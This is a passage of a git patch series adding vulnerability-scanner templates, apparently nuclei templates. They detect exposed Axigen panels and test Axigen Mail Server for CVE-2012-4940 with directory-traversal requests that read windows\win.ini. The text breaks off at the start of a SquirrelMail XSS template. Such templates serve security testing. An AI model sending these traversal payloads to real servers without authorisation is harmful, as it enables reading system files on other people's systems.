From 23c4a52aff483d7fa3a59c3e26eb1d6f9f87b6d3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Nov 2021 21:10:50 +0530 Subject: [PATCH 01/24] Create axigen-webmail.yaml --- exposed-panels/axigen-webmail.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/axigen-webmail.yaml diff --git a/exposed-panels/axigen-webmail.yaml b/exposed-panels/axigen-webmail.yaml new file mode 100644 index 0000000000..9db33d1bd4 --- /dev/null +++ b/exposed-panels/axigen-webmail.yaml @@ -0,0 +1,24 @@ +id: axigen-webmail + +info: + name: Axigen WebMail + author: dhiyaneshDk + severity: info + tags: axigen,panel + metadata: + shodan-query: 'http.title:"Axigen WebMail"' + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - 'Axigen WebMail' + + - type: status + status: + - 200 From 1d8f4a1b01d18625b5b1ab3b132d4653d7c9ba12 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Nov 2021 21:13:34 +0530 Subject: [PATCH 02/24] Create axigen-webadmin.yaml --- exposed-panels/axigen-webadmin.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/axigen-webadmin.yaml diff --git a/exposed-panels/axigen-webadmin.yaml b/exposed-panels/axigen-webadmin.yaml new file mode 100644 index 0000000000..130d6959d9 --- /dev/null +++ b/exposed-panels/axigen-webadmin.yaml @@ -0,0 +1,24 @@ +id: axigen-webadmin + +info: + name: Axigen Web Admin + author: dhiyaneshDk + severity: info + tags: axigen,panel + metadata: + shodan-query: 'http.title:"Axigen WebAdmin"' + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - 'Axigen WebAdmin' + + - type: status + status: + - 200 From c89128eaea50d8906da66d9c0d54891cd5073cf5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Nov 2021 21:17:27 +0530 Subject: [PATCH 03/24] Create CVE-2012-4940.yaml --- cves/2012/CVE-2012-4940.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cves/2012/CVE-2012-4940.yaml diff --git a/cves/2012/CVE-2012-4940.yaml b/cves/2012/CVE-2012-4940.yaml new file mode 100644 index 0000000000..5701fe8566 --- /dev/null +++ b/cves/2012/CVE-2012-4940.yaml @@ -0,0 +1,23 @@ +id: CVE-2012-4940 + +info: + name: Axigen Mail Server - 'Filename' Directory Traversal + author: dhiyaneshDk + severity: high + tags: axigen,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini" + - "{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini" + + stop-at-first-match: true + matchers: + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + part: body From 0f5ae5efbac228af6b9fd69942f6aeef7feadb95 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Nov 2021 21:18:14 +0530 Subject: [PATCH 04/24] Update CVE-2012-4940.yaml --- cves/2012/CVE-2012-4940.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2012/CVE-2012-4940.yaml b/cves/2012/CVE-2012-4940.yaml index 5701fe8566..f33bf7d5f4 100644 --- a/cves/2012/CVE-2012-4940.yaml +++ b/cves/2012/CVE-2012-4940.yaml @@ -4,6 +4,7 @@ info: name: Axigen Mail Server - 'Filename' Directory Traversal author: dhiyaneshDk severity: high + reference: https://www.exploit-db.com/exploits/37996 tags: axigen,lfi requests: From 8f0c36f0365a4251fdf75c4da04d4363cfa6fba0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Nov 2021 15:49:39 +0000 Subject: [PATCH 05/24] Auto Generated CVE annotations [Mon Nov 15 15:49:39 UTC 2021] :robot: --- cves/2012/CVE-2012-4940.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2012/CVE-2012-4940.yaml b/cves/2012/CVE-2012-4940.yaml index f33bf7d5f4..868fe8c819 100644 --- a/cves/2012/CVE-2012-4940.yaml +++ b/cves/2012/CVE-2012-4940.yaml @@ -6,6 +6,7 @@ info: severity: high reference: https://www.exploit-db.com/exploits/37996 tags: axigen,lfi + description: "Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI." requests: - method: GET From 4b4d7fc7c31a5f2cc1c654592136475d568c712b Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 15 Nov 2021 22:31:08 +0530 Subject: [PATCH 06/24] misc fix --- cves/2012/CVE-2012-4940.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/cves/2012/CVE-2012-4940.yaml b/cves/2012/CVE-2012-4940.yaml index 868fe8c819..58679a3d38 100644 --- a/cves/2012/CVE-2012-4940.yaml +++ b/cves/2012/CVE-2012-4940.yaml @@ -4,22 +4,22 @@ info: name: Axigen Mail Server - 'Filename' Directory Traversal author: dhiyaneshDk severity: high + description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI. reference: https://www.exploit-db.com/exploits/37996 - tags: axigen,lfi - description: "Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI." + tags: cve,cve2012,axigen,lfi requests: - method: GET path: - - "{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini" - - "{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini" + - '{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini' + - '{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini' stop-at-first-match: true matchers: - type: word + part: body words: - "bit app support" - "fonts" - "extensions" - condition: and - part: body + condition: and \ No newline at end of file From a0ce5a2918178f6d59d652d131955159e510a930 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Nov 2021 23:39:04 +0530 Subject: [PATCH 07/24] Create CVE-2002-1131.yaml --- cves/2002/CVE-2002-1131.yaml | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 cves/2002/CVE-2002-1131.yaml diff --git a/cves/2002/CVE-2002-1131.yaml b/cves/2002/CVE-2002-1131.yaml new file mode 100644 index 0000000000..b59119eaf9 --- /dev/null +++ b/cves/2002/CVE-2002-1131.yaml @@ -0,0 +1,34 @@ +id: CVE-2002-1131 + +info: + name: SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities + author: dhiyaneshDk + severity: medium + reference: https://www.exploit-db.com/exploits/21811 + description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + tags: xss,squirrelmail + +requests: + - method: GET + path: + - '{{BaseURL}}/src/addressbook.php?">